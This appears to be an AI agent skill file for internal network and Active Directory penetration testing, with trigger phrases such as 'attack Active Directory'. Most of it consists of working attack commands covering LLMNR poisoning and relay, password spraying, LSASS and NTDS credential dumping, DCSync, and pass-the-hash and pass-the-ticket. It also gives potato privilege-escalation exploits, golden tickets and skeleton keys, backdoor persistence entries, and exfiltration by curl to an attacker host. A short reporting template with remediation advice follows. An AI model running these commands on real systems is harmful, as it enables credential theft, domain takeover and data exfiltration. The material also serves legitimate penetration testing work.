name: network-pentest
description: "Internal network and Active Directory penetration testing skill for corporate environments. This skill should be used when performing internal network assessments, testing Active Directory security, exploiting Windows/Linux hosts, lateral movement, privilege escalation, and post-exploitation activities. Triggers on requests to pentest internal networks, attack Active Directory, perform lateral movement, or escalate privileges in Windows/Linux environments."

Network Penetration Testing

This skill enables comprehensive internal network and Active Directory penetration testing using tools like BloodHound, Impacket, Responder, CrackMapExec, Mimikatz, and various exploitation frameworks. It covers the full attack lifecycle from reconnaissance to post-exploitation.

When to Use This Skill

This skill should be invoked when:
- Performing internal network penetration tests
- Attacking Active Directory environments
- Conducting lateral movement testing
- Escalating privileges on Windows/Linux
- Testing network segmentation
- Extracting credentials and hashes
- Performing post-exploitation activities

Trigger Phrases

• "pentest the internal network"
• "attack Active Directory"
• "perform lateral movement"
• "escalate privileges"
• "extract credentials"
• "test network segmentation"

Prerequisites

Required Tools

Attack Methodology

1. **Reconnaissance**
   - Network scanning (Nmap)
   - Service enumeration
   - DNS/LDAP enumeration
   - Share enumeration

2. **Initial Access**
   - LLMNR/NBT-NS poisoning
   - Password spraying
   - Kerberos attacks (AS-REP roasting)
   - Default credentials

3. **Credential Access**
   - Hash extraction (SAM, NTDS)
   - Kerberoasting
   - LSASS dumping
   - Cached credentials

4. **Lateral Movement**
   - Pass-the-hash
   - Pass-the-ticket
   - Over-pass-the-hash
   - WMI/PSExec/WinRM

5. **Privilege Escalation**
   - Local privesc (Windows/Linux)
   - AD privilege escalation
   - Kerberos delegation abuse

6. **Domain Dominance**
   - DCSync attack
   - Golden/Silver tickets
   - Domain persistence

Network Reconnaissance

Nmap Scanning

# Host discovery
nmap -sn 192.168.1.0/24

# Quick port scan
nmap -F 192.168.1.0/24

# Full port scan
nmap -p- -T4 192.168.1.0/24

# Service version detection
nmap -sV -sC -p 21,22,23,25,53,80,88,135,139,389,443,445,464,636,3268,3389,5985 target

# Aggressive scan
nmap -A -T4 target

# Script scanning
nmap --script smb-vuln* target
nmap --script ldap* target
nmap --script kerberos* target

# Output formats
nmap -oA scan_results target
nmap -oX scan.xml target

Service Enumeration

# SMB Enumeration
smbclient -L //target -N
smbmap -H target
enum4linux -a target
crackmapexec smb target --shares

# LDAP Enumeration
ldapsearch -x -H ldap://target -b "DC=domain,DC=local"
ldapsearch -x -H ldap://target -s base namingcontexts

# DNS Enumeration
dig @target domain.local axfr
dnsrecon -d domain.local -t axfr -n target

# RPC Enumeration
rpcclient -U "" -N target
rpcclient -U "" target -c "enumdomusers"
rpcclient -U "" target -c "enumdomgroups"

# Kerberos Enumeration
nmap -p 88 --script krb5-enum-users target

Active Directory Reconnaissance

BloodHound Data Collection

# SharpHound collection (Windows)
.\SharpHound.exe -c All -d domain.local
.\SharpHound.exe -c All --ldapusername user --ldappassword pass

# BloodHound.py (Linux)
bloodhound-python -u 'user' -p 'password' -d domain.local -dc dc.domain.local -c All

# Import to BloodHound
# Start neo4j: neo4j console
# Start BloodHound: bloodhound
# Upload JSON/ZIP files

BloodHound Queries

# Find shortest path to Domain Admins
MATCH p=shortestPath((n:User)-[*1..]->(m:Group {name:"DOMAIN [email protected]"}))
RETURN p

# Users with DCSync rights
MATCH (n1)-[r:MemberOf|GetChanges|GetChangesAll*1..]->(u:Domain {name:"DOMAIN.LOCAL"})
RETURN n1.name

# Kerberoastable users
MATCH (u:User {hasspn:true}) RETURN u.name,u.serviceprincipalnames

# AS-REP Roastable users
MATCH (u:User {dontreqpreauth:true}) RETURN u.name

# Computers with unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c.name

# Find all Domain Admins
MATCH (u:User)-[:MemberOf*1..]->(g:Group {name:"DOMAIN [email protected]"})
RETURN u.name

# High value targets
MATCH (n {highvalue:true}) RETURN n.name, labels(n)

LDAP Enumeration

# Get domain info
ldapsearch -x -H ldap://dc.domain.local -D "[email protected]" -w 'password' \
  -b "DC=domain,DC=local" "(objectClass=domain)"

# Enumerate users
ldapsearch -x -H ldap://dc.domain.local -D "[email protected]" -w 'password' \
  -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName

# Find Kerberoastable accounts
ldapsearch -x -H ldap://dc.domain.local -D "[email protected]" -w 'password' \
  -b "DC=domain,DC=local" "(&(objectClass=user)(servicePrincipalName=*))" sAMAccountName servicePrincipalName

# Find AS-REP roastable accounts
ldapsearch -x -H ldap://dc.domain.local -D "[email protected]" -w 'password' \
  -b "DC=domain,DC=local" "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"

# Find computers
ldapsearch -x -H ldap://dc.domain.local -D "[email protected]" -w 'password' \
  -b "DC=domain,DC=local" "(objectClass=computer)" dNSHostName operatingSystem

# Enumerate groups
ldapsearch -x -H ldap://dc.domain.local -D "[email protected]" -w 'password' \
  -b "DC=domain,DC=local" "(objectClass=group)" cn member

Initial Access

LLMNR/NBT-NS Poisoning

# Start Responder
sudo responder -I eth0 -wrf

# With WPAD proxy
sudo responder -I eth0 -wrf --wpad

# Capture NTLMv2 hashes and crack
hashcat -m 5600 hashes.txt rockyou.txt

# Relay attacks (disable SMB in Responder first)
# Edit Responder.conf: SMB = Off, HTTP = Off
sudo ntlmrelayx.py -tf targets.txt -smb2support

# Relay to LDAP for delegation abuse
sudo ntlmrelayx.py -t ldap://dc.domain.local --escalate-user attacker

Password Spraying

# Kerbrute user enumeration
kerbrute userenum -d domain.local --dc dc.domain.local users.txt

# Password spray with Kerbrute
kerbrute passwordspray -d domain.local --dc dc.domain.local users.txt 'Password123!'

# CrackMapExec spray
crackmapexec smb dc.domain.local -u users.txt -p 'Password123!' --continue-on-success

# Spray with lockout awareness
spray.sh -smb dc.domain.local users.txt 'Password123!' 1 35

# Check password policy first
crackmapexec smb dc.domain.local -u 'user' -p 'password' --pass-pol

AS-REP Roasting

# Find AS-REP roastable users
GetNPUsers.py domain.local/ -dc-ip dc.domain.local -usersfile users.txt -format hashcat

# With credentials
GetNPUsers.py domain.local/user:password -dc-ip dc.domain.local -request

# Crack hashes
hashcat -m 18200 asrep_hashes.txt rockyou.txt

Kerberoasting

# Request service tickets
GetUserSPNs.py domain.local/user:password -dc-ip dc.domain.local -request

# Output to file
GetUserSPNs.py domain.local/user:password -dc-ip dc.domain.local -request -outputfile kerberoast.txt

# Crack hashes
hashcat -m 13100 kerberoast.txt rockyou.txt
john --wordlist=rockyou.txt kerberoast.txt

Credential Access

LSASS Dumping

# Mimikatz
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

# Task Manager (manual - GUI)
# Right-click lsass.exe -> Create dump file

# ProcDump
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Comsvcs.dll
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <lsass_pid> lsass.dmp full

# Parse dump offline
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"
pypykatz lsa minidump lsass.dmp

SAM/SYSTEM Extraction

# From live system (Windows)
reg save HKLM\SAM sam.bak
reg save HKLM\SYSTEM system.bak
reg save HKLM\SECURITY security.bak

# Extract hashes
impacket-secretsdump -sam sam.bak -system system.bak LOCAL

# Volume Shadow Copy
wmic shadowcopy call create Volume='C:\'
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\

NTDS.dit Extraction

# Remote extraction with secretsdump
secretsdump.py domain.local/administrator:[email protected]

# DCSync attack
secretsdump.py domain.local/administrator:[email protected] -just-dc-ntlm

# Specific user DCSync
secretsdump.py domain.local/administrator:[email protected] -just-dc-user krbtgt

# Using Mimikatz
mimikatz.exe "lsadump::dcsync /domain:domain.local /user:Administrator" "exit"
mimikatz.exe "lsadump::dcsync /domain:domain.local /all /csv" "exit"

Cached Credentials

# Mimikatz - cached domain credentials
mimikatz.exe "privilege::debug" "lsadump::cache" "exit"

# Crack cached credentials (DCC2)
hashcat -m 2100 dcc2_hashes.txt rockyou.txt

Lateral Movement

Pass-the-Hash

# Impacket tools
psexec.py domain.local/administrator@target -hashes :NTHASH
wmiexec.py domain.local/administrator@target -hashes :NTHASH
smbexec.py domain.local/administrator@target -hashes :NTHASH
atexec.py domain.local/administrator@target -hashes :NTHASH "whoami"

# CrackMapExec
crackmapexec smb targets.txt -u administrator -H NTHASH --local-auth
crackmapexec smb targets.txt -u administrator -H NTHASH -x "whoami"

# Evil-WinRM
evil-winrm -i target -u administrator -H NTHASH

Pass-the-Ticket

# Export tickets with Mimikatz
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

# Import ticket
mimikatz.exe "kerberos::ptt ticket.kirbi" "exit"

# Using Rubeus
Rubeus.exe ptt /ticket:ticket.kirbi

# Impacket with ticket
export KRB5CCNAME=/path/to/ticket.ccache
psexec.py -k -no-pass domain.local/user@target

Over-Pass-the-Hash

# Mimikatz - get TGT using NTLM hash
mimikatz.exe "sekurlsa::pth /user:administrator /domain:domain.local /ntlm:HASH /run:cmd.exe" "exit"

# Rubeus
Rubeus.exe asktgt /user:administrator /rc4:HASH /ptt
Rubeus.exe asktgt /user:administrator /aes256:AESKEY /ptt

WinRM/PSRemoting

# PowerShell remoting
Enter-PSSession -ComputerName target -Credential domain\user
Invoke-Command -ComputerName target -ScriptBlock { whoami } -Credential domain\user

# Evil-WinRM
evil-winrm -i target -u user -p 'password'
evil-winrm -i target -u user -H NTHASH

Privilege Escalation - Windows

Local Privilege Escalation

# WinPEAS
.\winPEAS.exe

# PowerUp
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# SharpUp
.\SharpUp.exe

# Common vectors
# - Unquoted service paths
# - Weak service permissions
# - AlwaysInstallElevated
# - Stored credentials
# - Token impersonation
# - Kernel exploits

Service Exploitation

# Check service permissions
accesschk.exe /accepteula -uwcqv "Authenticated Users" *

# Unquoted service path
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

# Modify service binary
sc qc VulnService
sc config VulnService binpath= "C:\temp\reverse.exe"
sc stop VulnService
sc start VulnService

Token Manipulation

# Juicy Potato (Windows Server 2016, Windows 10 before 1809)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\reverse.exe" -t *

# PrintSpoofer (Windows 10, Server 2016/2019)
PrintSpoofer.exe -i -c cmd

# RoguePotato
RoguePotato.exe -r <attacker_ip> -e "C:\temp\reverse.exe" -l 9999

# GodPotato (Universal)
GodPotato.exe -cmd "cmd /c whoami"

Privilege Escalation - Linux

Local Enumeration

# LinPEAS
./linpeas.sh

# LinEnum
./LinEnum.sh -t

# linux-exploit-suggester
./linux-exploit-suggester.sh

# Manual checks
id
sudo -l
find / -perm -4000 2>/dev/null  # SUID
find / -perm -2000 2>/dev/null  # SGID
getcap -r / 2>/dev/null         # Capabilities
cat /etc/crontab
ls -la /etc/cron*

Common Privilege Escalation Vectors

# Sudo misconfiguration
sudo -l
# (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/bash'

# SUID binaries
find / -perm -4000 2>/dev/null
# Check GTFOBins for exploitation

# Capabilities
getcap -r / 2>/dev/null
# cap_setuid+ep = privilege escalation possible

# Writable /etc/passwd
echo 'hacker:$(openssl passwd -1 password):0:0::/root:/bin/bash' >> /etc/passwd

# Cron jobs
cat /etc/crontab
# Check for writable scripts

# Kernel exploits
uname -a
# Search for matching CVEs

Domain Privilege Escalation

Kerberos Delegation Attacks

# Find delegation
Get-DomainComputer -Unconstrained
Get-DomainComputer -TrustedToAuth

# Unconstrained Delegation
# Coerce authentication to compromised host
# Extract TGT with Rubeus monitor mode

# Constrained Delegation
Rubeus.exe s4u /user:svc /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target /ptt

# Resource-Based Constrained Delegation
# Add computer to domain (if ms-DS-MachineAccountQuota > 0)
Impacket-addcomputer domain.local/user:password -computer-name FAKE01$ -computer-pass Password123
# Set delegation
Set-ADComputer target -PrincipalsAllowedToDelegateToAccount FAKE01$
# Get ticket
Rubeus.exe s4u /user:FAKE01$ /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target /ptt

ACL Abuse

# GenericAll on User
net user target NewPassword123! /domain

# GenericAll on Group
Add-DomainGroupMember -Identity "Domain Admins" -Members attacker

# GenericWrite on User
Set-DomainObject -Identity target -Set @{serviceprincipalname='fake/spn'}
# Then Kerberoast

# WriteDACL
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -Rights All -PrincipalIdentity attacker

Group Policy Abuse

# Check GPO permissions
Get-DomainGPO | Get-DomainObjectAcl | Where-Object {$_.ActiveDirectoryRights -match "CreateChild|WriteProperty"}

# SharpGPOAbuse
SharpGPOAbuse.exe --AddComputerTask --TaskName "Backdoor" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c net user hacker Password123! /add && net localgroup administrators hacker /add" --GPOName "VulnGPO"

Domain Dominance

DCSync Attack

# With secretsdump
secretsdump.py domain.local/domainadmin:[email protected]

# Get krbtgt hash
secretsdump.py domain.local/domainadmin:[email protected] -just-dc-user krbtgt

# Mimikatz
mimikatz.exe "lsadump::dcsync /domain:domain.local /user:krbtgt" "exit"

Golden Ticket

# Create golden ticket
mimikatz.exe "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:HASH /ptt" "exit"

# Impacket
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass domain.local/[email protected]

Silver Ticket

# Create silver ticket for specific service
mimikatz.exe "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /target:target.domain.local /service:cifs /rc4:SERVICE_HASH /ptt" "exit"

# Impacket
ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... -domain domain.local -spn cifs/target.domain.local Administrator

Skeleton Key

# Inject skeleton key (password: mimikatz)
mimikatz.exe "privilege::debug" "misc::skeleton" "exit"

# Now any user can authenticate with password "mimikatz"

Post-Exploitation

Persistence

# Registry Run Key
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\temp\beacon.exe"

# Scheduled Task
schtasks /create /tn "Updater" /tr "C:\temp\beacon.exe" /sc onlogon /ru SYSTEM

# WMI Event Subscription
# Use PowerLurk or manual WMI subscription

# Service
sc create Backdoor binpath= "C:\temp\beacon.exe" start= auto

# DLL Hijacking
# Place malicious DLL in application directory

# Golden Ticket (Domain)
# Already covered above

Data Exfiltration

# SMB
copy sensitive.docx \\attacker\share\

# HTTP
curl -X POST -F "[email protected]" http://attacker/upload

# DNS
# Use dnscat2 or similar

# Compress before exfil
7z a -ppassword archive.7z sensitive_folder/

Reporting Template

# Internal Network Penetration Test Report

## Executive Summary
- Assessment period: YYYY-MM-DD to YYYY-MM-DD
- Scope: Internal network / Active Directory
- Domain(s) tested: domain.local
- Hosts compromised: X
- Domain admin achieved: Yes/No

## Attack Path Summary
1. Initial access via LLMNR poisoning
2. Cracked NTLMv2 hash for user X
3. Kerberoasted service account Y
4. Lateral movement to server Z
5. DCSync attack for domain dominance

## Critical Findings

### [CRITICAL] LLMNR/NBT-NS Enabled
**Description**: LLMNR and NBT-NS protocols are enabled, allowing credential interception.
**Impact**: Attackers can capture and crack domain credentials.
**Recommendation**: Disable LLMNR and NBT-NS via Group Policy.

### [CRITICAL] Weak Service Account Passwords
**Description**: Service accounts with SPNs have weak passwords vulnerable to Kerberoasting.
**Affected Accounts**: svc_sql, svc_backup
**Recommendation**: Use strong passwords (25+ chars) or gMSA for service accounts.

## Recommendations Priority Matrix
| Priority | Finding | Remediation |
|----------|---------|-------------|
| P1 | LLMNR enabled | Disable via GPO |
| P1 | Weak SPN passwords | Implement gMSA |
| P2 | Unconstrained delegation | Remove unnecessary delegation |
| P2 | Local admin reuse | Implement LAPS |

Bundled Resources

scripts/

• ad_enum.py - Active Directory enumeration automation
• spray.sh - Safe password spraying with lockout awareness
• bloodhound_queries.md - Custom BloodHound Cypher queries

references/

• attack_paths.md - Common AD attack paths
• mimikatz_commands.md - Mimikatz command reference
• impacket_cheatsheet.md - Impacket tools cheatsheet

checklists/

• ad_pentest.md - AD penetration testing checklist
• privesc_windows.md - Windows privilege escalation checklist
• privesc_linux.md - Linux privilege escalation checklist